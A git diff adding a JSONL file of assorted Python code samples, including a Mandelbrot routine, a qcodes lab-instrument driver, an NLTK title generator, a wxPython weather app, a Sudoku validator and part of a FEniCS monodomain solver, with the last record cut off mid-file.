diff --git "a/4328.jsonl" "b/4328.jsonl" new file mode 100644--- /dev/null +++ "b/4328.jsonl" @@ -0,0 +1,665 @@ +{"seq_id":"316938271","text":"import math\n\ndef mandel(real, imag):\n \"\"\"\n Compute a point in the mandelbrot.\n\n The logarithm of number of iterations needed to\n determine whetner a complex point is in the\n mandelbrot set.\n\n Args:\n real, imag\n\n Returns:\n And integer in the range 1-255.\n \"\"\"\n x = 0\n y = 0\n for i in range(1, 257):\n if x * x + y * y > 4.0:\n break\n xt = real + x*x - y*y\n y = imag + 2.0*x*y\n x = xt\n\ndef mandelbrot(size_x, size_y):\n return [[mandel((3.5*x/size_x) - 2.5,\n (2.0 *y/size_y) - 1.0)\n for x in range(size_x)]\n for y in range(size_y)]\n\n","sub_path":"pluralsight/python_fundamentals/files_and_resource_mgmt/mandel.py","file_name":"mandel.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"105904619","text":"\n\n#calss header\nclass _SMEAR():\n\tdef __init__(self,): \n\t\tself.name = \"SMEAR\"\n\t\tself.definitions = [u'a dirty mark made by spreading a liquid or a thick substance over a surface: ', u\"an attempt to harm someone's reputation by publicly accusing them of something that is unpleasant, unreasonable, or unlikely to be true: \", u\"a medical test in which cells from a woman's cervix (= entrance to the womb) are removed and examined to discover if there is any disease\"]\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_smear.py","file_name":"_smear.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"424863307","text":"from functools import partial\nimport time\nfrom qcodes.instrument.base import Instrument\nfrom qcodes.utils import validators as vals\nfrom qcodes.instrument.parameter import ManualParameter\n\n\nclass ConversionBoxControl(Instrument):\n \"\"\"\n This is a meta-instrument for controlling the different switches in the\n conversion box designed in the QuDev lab. This class implements the control\n over\n * 2 amplifiers, whose input port can be chosen between the fridge and a\n reference signal\n * 5 up-conversion mixers, that can be operated in modulation or mixer-\n bypass mode\n * a switchboard that can route the input signal to one of the 6 output\n ports\n The switchboard is controlled using an Advantech PCIE-1751 digital I/O card.\n This meta-instrument takes full control of the underlying DIO card which\n should not be modified by other classes.\n \"\"\"\n\n shared_kwargs = ['dio']\n\n def __init__(self, name, dio, switch_time=50e-3, **kw):\n \"\"\"\n :param name: name of the instrument\n :param dio: reference to an Advantech PCIE-1751 instrument\n :param switch_time: duration of the pulse to set the switch\n configuration\n \"\"\"\n super().__init__(name, **kw)\n self.dio = dio\n\n # configure all DIO ports for output\n for i in range(self.dio.port_count()):\n self.dio.set('port{}_dir'.format(i), 0xff)\n\n self._switch_state = {\n 'UC1': 'modulated',\n 'UC2': 'modulated',\n 'UC3': 'modulated',\n 'UC4': 'modulated',\n 'UC5': 'modulated',\n 'WA1': 'measure',\n 'WA2': 'measure',\n 'switch': 'block',\n }\n\n UCkey = ['']*6\n for i in range(1, 6):\n descr = 'switch configuration of up-conversion board {}'\n UCkey[i] = 'UC{}'.format(i)\n self.add_parameter(\n '{}_mode'.format(UCkey[i]),\n label=descr.format(i),\n vals=vals.Enum('modulated', 'bypass'),\n get_cmd=partial(self._switch_state.get, UCkey[i]),\n set_cmd=lambda x: self.set_switch({UCkey[i]: x})\n )\n\n WAkey = ['']*3\n for i in range(1, 3):\n descr = 'switch configuration of warm amplifier {}'\n WAkey[i] = 'WA{}'.format(i)\n self.add_parameter(\n '{}_mode'.format(WAkey[i]),\n label=descr.format(i),\n vals=vals.Enum('reference', 'measure'),\n get_cmd=partial(self._switch_state.get, WAkey[i]),\n set_cmd=lambda x: self.set_switch({WAkey[i]: x})\n )\n\n self.add_parameter(\n 'switch_mode',\n label='switchboard configuration',\n vals=vals.Enum('block', 1, 2, 3, 4, 5, 6),\n get_cmd=partial(self._switch_state.get, 'switch'),\n set_cmd=lambda x: self.set_switch({'switch': x})\n )\n\n self.add_parameter('switch_time', unit='s', vals=vals.Numbers(0, 1),\n label='Duration of the switching pulse',\n parameter_class=ManualParameter,\n initial_value=switch_time)\n\n def set_switch(self, values):\n \"\"\"\n :param values: a dictionary of key: value pairs, where key is one of\n the following: 'UC#', 'WA#' or 'switch' (# denotes the\n board number) and value is the mode to set the switch to.\n \"\"\"\n #logging.debug(values)\n for key in values:\n self.parameters['{}_mode'.format(key)].validate(values[key])\n self._switch_state.update(values)\n\n data = [0x00, 0x00, 0x00, 0x00, 0x00, 0x00]\n data[0] += self._WA_bitpattern(self._switch_state['WA2']) << 0\n data[0] += self._WA_bitpattern(self._switch_state['WA1']) << 2\n data[1] += self._UC_bitpattern(self._switch_state['UC1']) << 0\n data[1] += self._UC_bitpattern(self._switch_state['UC2']) << 2\n data[1] += self._UC_bitpattern(self._switch_state['UC3']) << 4\n data[1] += self._UC_bitpattern(self._switch_state['UC4']) << 6\n data[2] += self._UC_bitpattern(self._switch_state['UC5']) << 0\n data[5] = self._switch_bitpattern(self._switch_state['switch'])\n\n self.dio.write_port(0, data)\n time.sleep(self.switch_time())\n self.dio.write_port(0, [0, 0, 0, 0, 0, 0])\n\n for key in values:\n self.parameters['{}_mode'.format(key)]._save_val(values[key])\n\n @classmethod\n def _WA_bitpattern(cls, mode):\n if mode == 'reference':\n return 0b01\n elif mode == 'measure':\n return 0b10\n else:\n raise ValueError('Trying to set warm amplifier board switch to '\n 'invalid mode: {}'.format(mode))\n\n @classmethod\n def _UC_bitpattern(cls, mode):\n if mode == 'bypass':\n return 0b01\n elif mode == 'modulated':\n return 0b10\n else:\n raise ValueError('Trying to set up-conversion board switch to '\n 'invalid mode: {}'.format(mode))\n\n @classmethod\n def _switch_bitpattern(cls, mode):\n if mode == 'block':\n return 0b10000000\n elif mode in range(1,7):\n return 1 << (7-mode)\n else:\n raise ValueError('Trying to set the switchboard to invalid mode: '\n '{}'.format(mode))\n","sub_path":"pycqed/instrument_drivers/meta_instrument/conversion_box_control.py","file_name":"conversion_box_control.py","file_ext":"py","file_size_in_byte":5535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"644883682","text":"# -*- coding: utf-8 -*-\nimport nltk, random, math, re, itertools\nfrom nltk.tokenize import RegexpTokenizer\nfrom nltk.corpus import stopwords\nfrom utils import myutils\nimport re\nimport corpus_data\n#myutils.set_ipython_encoding_utf8()\n\nclass TitleGenerator:\n\n #Load tokens and tags from file\n thefile = open('data/tokenized', 'r')\n tokenized_titles = eval(thefile.read())\n thefile.close()\n\n thefile = open('data/tagged', 'r')\n tagged_titles = eval(thefile.read())\n thefile.close()\n\n def __init__(self):\n titles = corpus_data.titles\n #choose random slice of 100 titles from dataset\n self.rand = random.randint(0, len(titles) - 100) \n\n self.titles = titles[self.rand:self.rand+100]\n self.tokenized_titles_slice = self.tokenized_titles[self.rand:self.rand+100]\n self.tagged_titles_slice = self.tagged_titles[self.rand:self.rand+100]\n self.set_title_range()\n\n #generate required stats for generation model\n self.bigrams = self.build_bigrams()\n self.freq_dist = self.build_freq_dist()\n\n #generate required stats for title heuristics\n self.title_pos_structures = self.build_title_pos_structures()\n\n #compute range of title sizes from random 100 slice\n def set_title_range(self):\n self.min_title_length = 5\n self.max_title_length = 5\n for title in self.titles:\n length = len(title.split())\n\n if length > self.max_title_length:\n self.max_title_length = length\n\n if length < self.min_title_length:\n self.min_title_length = length\n\n def build_freq_dist(self):\n flat_all_bigrams = list(itertools.chain(*self.bigrams))\n return nltk.ConditionalFreqDist(flat_all_bigrams) \n\n def build_bigrams(self):\n bigrams = []\n for title in self.tokenized_titles_slice:\n bigrams.append(nltk.bigrams(title))\n return bigrams\n\n def first_words_list(self):\n first_words = []\n for title in self.tokenized_titles_slice:\n first_words.append(title[0])\n return first_words\n\n def build_title(self):\n word = random.choice(self.first_words_list()) #choose random seed word from all starting words\n title_length = random.randint(self.min_title_length, self.max_title_length) #choose random length in range\n generated_title = word + ' '\n\n for i in range(title_length):\n if (self.freq_dist[word]):\n word = random.choice(self.freq_dist[word].most_common(3))[0]\n generated_title += word + ' '\n else:\n break\n\n return generated_title.lower()\n\n def build_title_pos_structures(self):\n sentence_structures = []\n for word_tag_pair in self.tagged_titles:\n temp = []\n for pair in word_tag_pair:\n temp.append(pair[1])\n sentence_structures.append(temp)\n\n return sentence_structures\n\n def compare_readability(self,title_pos_structure, generated_title_pos_structure):\n\n #iterate over real POS tagged titles checking for similarity to generated title\n readability = 0\n for index in range(len(title_pos_structure)):\n if len(generated_title_pos_structure) > index:\n if (title_pos_structure[index] == generated_title_pos_structure[index]):\n readability += 1\n else:\n break\n\n return readability\n\n def generate_title(self):\n match_found = False\n\n while not match_found:\n generated_title = self.build_title()\n\n #tokenize and tag generated title\n tokenized = myutils.tokenize_zh_line(generated_title)\n last_word = tokenized[-1]\n tagged = nltk.pos_tag(tokenized)\n\n\n #disallow title to end in stopword\n stopwords = open('data/stop-words/zh_cn.txt')\n stopwords_list = [ word.decode('utf-8').strip() for word in stopwords.readlines() ]\n if(last_word in stopwords_list):\n continue\n\n #disallow exact duplicates of existing titles\n if generated_title in \" \".join(corpus_data.titles):\n continue\n\n #require a certain title length\n if len(generated_title.split()) < self.min_title_length:\n continue\n\n #disallow ending on certain types of words\n generated_structure = []\n for word_tag_pair in tagged:\n generated_structure.append(word_tag_pair[1])\n\n not_aloud = [\"JJ\", \"CC\", \"CD\", \"DT\", \"JJS\", \"JJR\", \"TO\", \"IN\", \"LS\", \"MD\", \"PDT\", \"POS\",\n \"PP\", \"PPS\", \"SYM\", \"UH\", \"VBD\", \"VBG\", \"VBN\", \"VBP\", \"VBZ\", \"WDT\", \"WP\",\n \"WPS\", \"WRB\"]\n\n if(generated_structure[-1] in not_aloud):\n continue\n\n #compute 80% match in pos tags\n match_cutoff = int(math.ceil(len(tokenized) *.80))\n\n #check if satisfies readability threshold\n for sentence_structure in self.title_pos_structures:\n match_count = self.compare_readability(sentence_structure, generated_structure)\n if match_count >= match_cutoff:\n match_found = True\n break\n\n return generated_title\n\n","sub_path":"test_zh.py","file_name":"test_zh.py","file_ext":"py","file_size_in_byte":5375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"271634389","text":"from mpi4py import MPI\nfrom tmr import TMR\nimport argparse\n\n# Create the communicator\ncomm = MPI.COMM_WORLD\n\n# Create an argument parser to read in command-line arguments\np = argparse.ArgumentParser()\np.add_argument('--reverse', default=False, action='store_true')\nargs = p.parse_args()\n\n# Load the model from the STEP file\ngeo = TMR.LoadModel('first-section.stp')\n\n# Get the volumes\nvols = geo.getVolumes()\n\n# Get the edges/faces from the geometry\nfaces = geo.getFaces()\nedges = geo.getEdges()\n\n# Set the source/target relationships\nif args.reverse:\n faces[4].setSource(vols[0], faces[5])\nelse:\n faces[5].setSource(vols[0], faces[4])\nedges[8].setSource(edges[5])\n\n# Create the geometry\nmesh = TMR.Mesh(comm, geo)\n\n# Mesh the part\nopts = TMR.MeshOptions()\nopts.num_smoothing_steps = 10\n\n# Mesh the geometry with the given target size\nhtarget = 4.0\nmesh.mesh(htarget, opts=opts)\n\n# Write the mesh to a bdf file\nmesh.writeToBDF('volume-mesh.bdf', 'hex')\n","sub_path":"examples/crm/ucrm.py","file_name":"ucrm.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"511034716","text":"\"\"\"\nCreate a weather_processor.py module with a WeatherProcessor class\ninside.\n• When the program starts, present the user with a menu of choices.\n• Allow the user to download a full set of weather data, or to update it.\n◦ When updating, the program should check today’s date and the latest\ndate of weather available in the DB, and download what’s missing\nbetween those two points, without duplicating any data.\n• Allow the user to enter a year range of interest (from year, to year) to\ngenerate the box plot.\n• Allow the user to enter a month and a year to generate the line plot.\n• Use this class to launch and manage all the other tasks.\n• All user interaction should be self contained in the WeatherProcessor\nclass. There should be no user prompt type code anywhere else in the\nprogram.\n\"\"\"\n\nimport wx\nfrom db_operations import DBOperations\nfrom scrape_weather import WeatherScraper\nfrom plot_operations import PlotOperations\n\nclass WeatherProcessor(wx.Frame):\n \"\"\"docstring for WeatherProcessor.\"\"\"\n\n def __init__(self):\n \"\"\"initialize for WeatherProcessor. Use wxpython for user interaction\"\"\"\n self.db_name = 'weather.sqlite'\n self.table_name = 'weather'\n\n super().__init__(parent=None, title='Weather Processor')\n panel = wx.Panel(self)\n my_sizer = wx.BoxSizer(wx.VERTICAL)\n\n # install all or update db buttons\n install_lbl = wx.StaticText(panel)\n big_font = wx.Font(18, wx.ROMAN, wx.ITALIC, wx.NORMAL)\n install_lbl.SetFont(big_font)\n install_lbl.SetLabel('Install All or Update Database')\n my_sizer.Add(install_lbl,0,wx.ALL | wx.ALIGN_LEFT,5)\n\n install_all_btn = wx.Button(panel, label='Install All')\n install_all_btn.Bind(wx.EVT_BUTTON, self.clear_db_and_install_all_weather_data)\n my_sizer.Add(install_all_btn, 0, wx.ALL | wx.LEFT, 5)\n\n update_btn = wx.Button(panel, label='Update Database')\n update_btn.Bind(wx.EVT_BUTTON, self.update_db)\n my_sizer.Add(update_btn, 0, wx.ALL | wx.LEFT, 5)\n\n # boxplot part\n boxplot_lbl = wx.StaticText(panel)\n boxplot_lbl.SetFont(big_font)\n boxplot_lbl.SetLabel('Boxplot Year Range')\n my_sizer.Add(boxplot_lbl,0,wx.ALL | wx.ALIGN_LEFT,5)\n\n from_lbl = wx.StaticText(panel)\n small_font = wx.Font(14, wx.ROMAN, wx.ITALIC, wx.NORMAL)\n from_lbl.SetFont(small_font)\n from_lbl.SetLabel('From: ')\n my_sizer.Add(from_lbl,0,wx.ALL | wx.ALIGN_LEFT,5)\n\n self.start_year_text_ctrl = wx.TextCtrl(panel)\n my_sizer.Add(self.start_year_text_ctrl, 0, wx.ALL | wx.EXPAND, 5)\n\n to_lbl = wx.StaticText(panel)\n to_lbl.SetFont(small_font)\n to_lbl.SetLabel('To: ')\n my_sizer.Add(to_lbl,0,wx.ALL | wx.ALIGN_LEFT,5)\n\n self.end_year_text_ctrl = wx.TextCtrl(panel)\n my_sizer.Add(self.end_year_text_ctrl, 0, wx.ALL | wx.EXPAND, 5)\n\n boxplot_btn = wx.Button(panel, label='Generate Boxplot')\n boxplot_btn.Bind(wx.EVT_BUTTON, self.boxplot)\n my_sizer.Add(boxplot_btn, 0, wx.ALL | wx.LEFT, 5)\n\n # lineplot part\n lineplot_lbl = wx.StaticText(panel)\n lineplot_lbl.SetFont(big_font)\n lineplot_lbl.SetLabel('Lineplot Year and Month')\n my_sizer.Add(lineplot_lbl,0,wx.ALL | wx.ALIGN_LEFT,5)\n\n year_lbl = wx.StaticText(panel)\n year_lbl.SetFont(small_font)\n year_lbl.SetLabel('Year: ')\n my_sizer.Add(year_lbl,0,wx.ALL | wx.ALIGN_LEFT,5)\n\n self.year_text_ctrl = wx.TextCtrl(panel)\n my_sizer.Add(self.year_text_ctrl, 0, wx.ALL | wx.EXPAND, 5)\n\n month_lbl = wx.StaticText(panel)\n month_lbl.SetFont(small_font)\n month_lbl.SetLabel('Month: ')\n my_sizer.Add(month_lbl,0,wx.ALL | wx.ALIGN_LEFT,5)\n\n self.month_text_ctrl = wx.TextCtrl(panel)\n my_sizer.Add(self.month_text_ctrl, 0, wx.ALL | wx.EXPAND, 5)\n\n lineplot_btn = wx.Button(panel, label='Generate Lineplot')\n lineplot_btn.Bind(wx.EVT_BUTTON, self.lineplot)\n my_sizer.Add(lineplot_btn, 0, wx.ALL | wx.LEFT, 5)\n\n\n panel.SetSizer(my_sizer)\n self.Show()\n\n def boxplot(self, event):\n \" Generate and save boxplot \"\n start_year = self.start_year_text_ctrl.GetValue()\n end_year = self.end_year_text_ctrl.GetValue()\n db_name = 'weather.sqlite'\n table_name = 'weather'\n my_plot_operations = PlotOperations(db_name, table_name)\n my_plot_operations.generate_boxplot(int(start_year), int(end_year))\n\n def lineplot(self, event):\n \" Generate and save lineplot \"\n year = self.year_text_ctrl.GetValue()\n month = self.month_text_ctrl.GetValue()\n db_name = 'weather.sqlite'\n table_name = 'weather'\n my_plot_operations = PlotOperations(db_name, table_name)\n my_plot_operations.generate_lineplot(int(year), int(month))\n\n def clear_db_and_install_all_weather_data(self, event):\n \" clear db and install all weather data \"\n myweather = WeatherScraper()\n myweather.start_scraping()\n weather_data_from_weather_scraper = myweather.weather\n db_operations = DBOperations(self.db_name)\n db_operations.initialize_db(self.table_name)\n db_operations.purge_data(self.table_name)\n db_operations.save_data(weather_data_from_weather_scraper, self.table_name)\n\n def update_db(self, event):\n \" install missing weather data \"\n myweather = WeatherScraper()\n with DBOperations(self.db_name) as dbcm:\n dbcm.execute(f\"select max(sample_date) from {self.table_name};\")\n latest_date = dbcm.fetchall()[0][0]\n\n print('latest date in db', latest_date)\n myweather.start_scraping(latest_date)\n weather_data_from_weather_scraper = myweather.weather\n db_operations = DBOperations(self.db_name)\n db_operations.initialize_db(self.table_name)\n db_operations.save_data(weather_data_from_weather_scraper, self.table_name)\n\nif __name__ == '__main__':\n app = wx.App()\n frame = WeatherProcessor()\n frame.SetSize(500,600)\n app.MainLoop()\n input(\"press enter to finish\")\n","sub_path":"weather_processor.py","file_name":"weather_processor.py","file_ext":"py","file_size_in_byte":6177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"356775238","text":"#! -*- coding: utf-8 -*-\n# 测试代码可用性: MLM\n\nimport os\nfrom bert4keras.bert import load_pretrained_model\nfrom bert4keras.utils import SimpleTokenizer, load_vocab\nimport numpy as np\n\nalbert_model_path = '/home/gswyhq/github_projects/albert_zh/albert_large_zh'\n# albert_model_path = '/notebooks/albert_zh/albert_large_zh'\n# https://storage.googleapis.com/albert_zh/albert_large_zh.zip\n\nconfig_path = os.path.join(albert_model_path, 'albert_config_large.json')\ncheckpoint_path = os.path.join(albert_model_path, 'albert_model.ckpt')\ndict_path = os.path.join(albert_model_path, 'vocab.txt')\n\ntoken_dict = load_vocab(dict_path) # 读取词典\ntokenizer = SimpleTokenizer(token_dict) # 建立分词器\nmodel = load_pretrained_model(config_path, checkpoint_path, with_mlm=True) # 建立模型,加载权重\n\n\n# token_ids, segment_ids = tokenizer.encode(u'科学技术是第一生产力')\ntoken_ids, segment_ids = tokenizer.encode(u'中国的首都是北京')\n\nprint('token_ids: {}, segment_ids: {}'.format(token_ids, segment_ids))\n\n# mask掉“技术”\n# token_ids[3] = token_ids[4] = token_dict['[MASK]']\ntoken_ids[4] = token_ids[5] = token_dict['[MASK]']\n\n# 用mlm模型预测被mask掉的部分\nprobas = model.predict([np.array([token_ids]), np.array([segment_ids])])[0]\n# print(tokenizer.decode(probas[3:5].argmax(axis=1))) # 结果正是“技术”\nprint(tokenizer.decode(probas.argmax(axis=1)))\n","sub_path":"examples/basic_masked_language_model.py","file_name":"basic_masked_language_model.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"407480972","text":"# Modules\r\nimport os\r\nimport csv\r\n \r\n\r\n#Declare variables\r\ntotal_votes=0\r\npoll_data_cand = []\r\ncand_name =\"\"\r\ntotal_votes_cand = 0\r\ntotal_perc_cand = 0.000\r\nd ={}\r\n\r\nprint('\\n Election Results\\n' + '-' *30)\r\n\r\nwith open(\"election_data.csv\") as f:\r\n reader = csv.reader(f)\r\n next(reader)\r\n\r\n #Candidates Name\r\n for row in reader:\r\n poll_data_cand.append(row[2])\r\n \r\n \r\n #Total Votes \r\n total_votes = len(poll_data_cand) \r\n print(f'Total Votes: {total_votes}\\n' + '-'*30)\r\n\r\nsort_can = sorted(poll_data_cand)\r\ncand_name = poll_data_cand[1]\r\nlist_cand = []\r\nlist_perc = []\r\nlist_tot = []\r\n\r\nfor x in range(len(sort_can)):\r\n \r\n if sort_can[x] == cand_name:\r\n total_votes_cand+=1\r\n cand_name=sort_can[x]\r\n if total_votes == x+1:\r\n total_perc_cand=total_votes_cand/total_votes*100\r\n print(f'{cand_name}: {round(total_perc_cand,0)}% ({total_votes_cand})\\n') \r\n list_cand.append(cand_name)\r\n list_perc.append(round(total_perc_cand,0))\r\n list_tot.append(total_votes_cand)\r\n \r\n else:\r\n total_perc_cand=total_votes_cand/total_votes*100\r\n print(f'{cand_name}: {round(total_perc_cand,0)}% ({total_votes_cand})\\n')\r\n list_cand.append(cand_name)\r\n list_perc.append(round(total_perc_cand,0))\r\n list_tot.append(total_votes_cand)\r\n \r\n total_votes_cand = 1\r\n cand_name=sort_can[x]\r\n\r\nd = dict(zip(list_cand,zip(list_perc,list_tot)))\r\nprint('-'*30)\r\nkey_max = max(d.keys(),key=(lambda k: d[k]))\r\nprint(f'Winner:{key_max}')\r\nprint('-'*30)\r\n\r\n#Output to text file\r\nwith open('election_results.txt',\"w\") as txt_file:\r\n txt_file.write(f'\\n Election Results\\n' + '-' *30)\r\n txt_file.write(f'\\nTotal Votes: {total_votes}\\n' + '-'*30)\r\n for key,v in d.items():\r\n txt_file.write(f'\\n{key,v}\\n')\r\n txt_file.write(f'-'*30)\r\n txt_file.write(f'\\nWinner:{key_max}\\n')\r\n txt_file.write(f'-'*30)","sub_path":"PyPoll/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"339097966","text":"import time,unittest\nfrom testsuites.base_testcase import BaseTestCase\nfrom pageobjects.login_page import Login_HomePage\nfrom pageobjects.main_page import Main_Homepage\nfrom pageobjects.look_tie_page import Look_Tie_HomePage\nfrom ddt import ddt,data,unpack\n\n@ddt\nclass Test_Search_Tie(BaseTestCase):\n @unpack\n def test_search_tie(self):\n test_login = Login_HomePage(self.driver)\n test_main = Main_Homepage(self.driver)\n test_look_tie=Look_Tie_HomePage(self.driver)\n test_login.login('admin','admin')\n test_main.search('haotest')\n test_look_tie.enter_post()\n title=test_look_tie.check()\n try:\n self.assertEqual(title,'haotest',msg=title)\n print('断言结果:帖子标题和期望的一致')\n except:\n print('断言结果:帖子标题和期望的不一致')\n test_main.logout()\n\n\nif __name__=='__main__':\n unittest.main()\n\n","sub_path":"testsuites/test_search_tie.py","file_name":"test_search_tie.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"599757663","text":"# Valid Sudoku \n# Determine if a Sudoku is valid, according to: Sudoku Puzzles - The Rules.\n\n# The Sudoku board could be partially filled, where empty cells are filled with the character '.'.\n\n\n# A partially filled sudoku which is valid.\n\n# Note:\n# A valid Sudoku board (partially filled) is not necessarily solvable. Only the filled cells need to be validated.\n\nclass Solution:\n # @param board, a 9x9 2D array\n # @return a boolean\n def isValidSudoku(self, board):\n for row in board:\n if not Solution.isValidBlock(row):\n return False\n for i in range(9):\n col = [row[i] for row in board]\n if not Solution.isValidBlock(col):\n return False\n for i in range(3):\n for j in range(3):\n block = [cell for cell in row[3*j:3*j+3] for row in board[3*i: 3*i+3]]\n if not Solution.isValidBlock(block):\n return False\n return True\n\n @staticmethod\n def isValidBlock(block):\n counter = [0]*9\n for cell in block:\n if cell == '.':\n continue\n num = int(cell)\n if num < 1 or num > 9:\n return False\n if counter[num] > 0:\n return False\n counter[num] = 1\n return True\n","sub_path":"036_ValidSudoku/valid_sudoku.py","file_name":"valid_sudoku.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"562235023","text":"import random\n\nrand_num = random.randrange(1,51)\n\ni = 1\n\n\nwhile(i != rand_num):\n i +=1\n\nprint(\"The random value is :\", rand_num)\n\ni = 1\n\nwhile i<= 20:\n if(i%2) == 0:\n i +=1\n continue\n if i == 15:\n break\n print(\"odd :\", i)\n\n i +=1\n\n","sub_path":"loops/while_loop.py","file_name":"while_loop.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"72472603","text":"import dolfin as df\n\nfrom typing import (\n Dict,\n Any,\n Tuple,\n NamedTuple,\n Iterable,\n)\n\nfrom coupled_utils import (\n CellTags,\n InterfaceTags,\n CoupledMonodomainParameters,\n create_linear_solver,\n time_stepper,\n)\n\n\nclass CoupledMonodomainSolver:\n def __init__(\n self,\n time: df.Constant,\n mesh: df.Mesh,\n conductivity: Dict[int, df.Expression],\n conductivity_ratio: Dict[int, df.Expression],\n cell_function: df.MeshFunction,\n cell_tags: CellTags,\n interface_function: df.MeshFunction,\n interface_tags: InterfaceTags,\n parameters: CoupledMonodomainParameters,\n neumann_boundary_condition: Dict[int, df.Expression] = None,\n v_prev: df.Function = None\n ) -> None:\n self._time = time\n self._mesh = mesh\n self._conductivity = conductivity\n self._cell_function = cell_function\n self._cell_tags = cell_tags\n self._interface_function = interface_function\n self._interface_tags = interface_tags\n self._parameters = parameters\n\n if neumann_boundary_condition is None:\n self._neumann_boundary_condition: Dict[int, df.Expression] = dict()\n else:\n self._neumann_boundary_condition = neumann_boundary_condition\n\n if not set(conductivity.keys()) == set(conductivity_ratio.keys()):\n raise ValueError(\"intracellular conductivity and lambda does not have natching keys.\")\n self._lambda = conductivity_ratio\n\n # Function spaces\n self._function_space = df.FunctionSpace(mesh, \"CG\", 1)\n\n # Test and trial and previous functions\n self._v_trial = df.TrialFunction(self._function_space)\n self._v_test = df.TestFunction(self._function_space)\n\n self._v = df.Function(self._function_space)\n if v_prev is None:\n self._v_prev = df.Function(self._function_space)\n else:\n # v_prev is shipped from an odesolver.\n self._v_prev = v_prev\n\n _cell_tags = set(self._cell_tags)\n _cell_function_values = set(self._cell_function.array())\n if not _cell_tags <= _cell_function_values:\n msg = f\"Cell function does not contain {_cell_tags - _cell_function_values}\"\n raise ValueError(msg)\n\n _interface_tags = set(self._interface_tags)\n _interface_function_values = {*set(self._interface_function.array()), None}\n if not _interface_tags <= _interface_function_values:\n msg = f\"interface function does not contain {_interface_tags - _interface_function_values}.\"\n raise ValueError(msg)\n\n # Crete integration measures -- Interfaces\n self._dGamma = df.Measure(\"ds\", domain=self._mesh, subdomain_data=self._interface_function)\n\n # Crete integration measures -- Cells\n self._dOmega = df.Measure(\"dx\", domain=self._mesh, subdomain_data=self._cell_function)\n\n # Create variational forms\n self._timestep = df.Constant(self._parameters.timestep)\n self._lhs, self._rhs = self._variational_forms()\n\n # Preassemble left-hand side (will be updated if time-step changes)\n self._lhs_matrix = df.assemble(self._lhs)\n self._rhs_vector = df.Vector(mesh.mpi_comm(), self._lhs_matrix.size(0))\n self._lhs_matrix.init_vector(self._rhs_vector, 0)\n\n self._linear_solver = create_linear_solver(self._lhs_matrix, self._parameters)\n\n def _variational_forms(self) -> Tuple[Any, Any]:\n # Localise variables for convenicence\n dt = self._timestep\n theta = self._parameters.theta\n Mi = self._conductivity\n lbda = self._lambda\n\n dOmega = self._dOmega\n dGamma = self._dGamma\n\n v = self._v_trial\n v_test = self._v_test\n\n # Set-up variational problem\n dvdt = (v - self._v_prev)/dt\n v_mid = theta*v + (1.0 - theta)*self._v_prev\n\n # Cell contributions\n Form = dvdt*v_test*dOmega()\n for cell_tag in self._cell_tags:\n Form += df.inner(Mi[cell_tag]*df.grad(v_mid), df.grad(v_test))*dOmega(cell_tag)\n\n # Boundary contributions\n for interface_tag in self._interface_tags:\n neumann_bc = self._neumann_boundary_condition.get(interface_tag, df.Constant(0))\n neumann_bc = neumann_bc*v_test*dGamma(interface_tag)\n Form += neumann_bc\n\n # Interface conditions\n csf_tag = self._cell_tags.CSF\n gm_tag = self._cell_tags.GM\n csf_gm_interface_tag = self._interface_tags.CSF_GM\n interface_contribution = df.inner(Mi[csf_tag]*df.grad(v), Mi[gm_tag]/(1 + lbda[gm_tag])*df.grad(v))\n interface_contribution *= dGamma(csf_gm_interface_tag)\n Form += interface_contribution\n\n # rhs # TODO: This is not necessary\n Form += df.Constant(0)*v_test*dOmega\n\n a, L = df.system(Form)\n return a, L\n\n def solution_fields(self) -> Tuple[df.Function, df.Function]:\n \"\"\"Return current and previous solution.\"\"\"\n return self._v_prev, self._v\n\n def step(self, t0, t1) -> None:\n # Extract interval and thus time-step\n theta = self._parameters.theta\n dt = t1 - t0\n t = t0 + theta*dt\n self._time.assign(t)\n\n # Update matrix and linear solvers etc as needed\n self._update_solver(dt)\n\n # Assemble right-hand-side\n df.assemble(self._rhs, tensor=self._rhs_vector)\n\n # Solve problem\n self._linear_solver.solve(\n self._v.vector(),\n self._rhs_vector\n )\n\n def solve(\n self,\n t0: float,\n t1: float,\n dt: float = None\n ) -> Iterable[Tuple[Tuple[float, float], Tuple[df.Function, df.Function]]]:\n \"\"\"\n Solve the discretization on a given time interval (t0, t1)\n with a given timestep dt and return generator for a tuple of\n the interval and the current solution.\n\n *Arguments*\n interval (:py:class:`tuple`)\n The time interval for the solve given by (t0, t1)\n dt (int, optional)\n The timestep for the solve. Defaults to length of interval\n\n *Returns*\n (timestep, solution_field) via (:py:class:`genexpr`)\n\n *Example of usage*::\n\n # Create generator\n solutions = solver.solve((0.0, 1.0), 0.1)\n\n # Iterate over generator (computes solutions as you go)\n for (interval, solution_fields) in solutions:\n (t0, t1) = interval\n v_, v = solution_fields\n # do something with the solutions\n \"\"\"\n for interval in time_stepper(t0=t0, t1=t1, dt=dt):\n # info(\"Solving on t = (%g, %g)\" % (t0, t1))\n 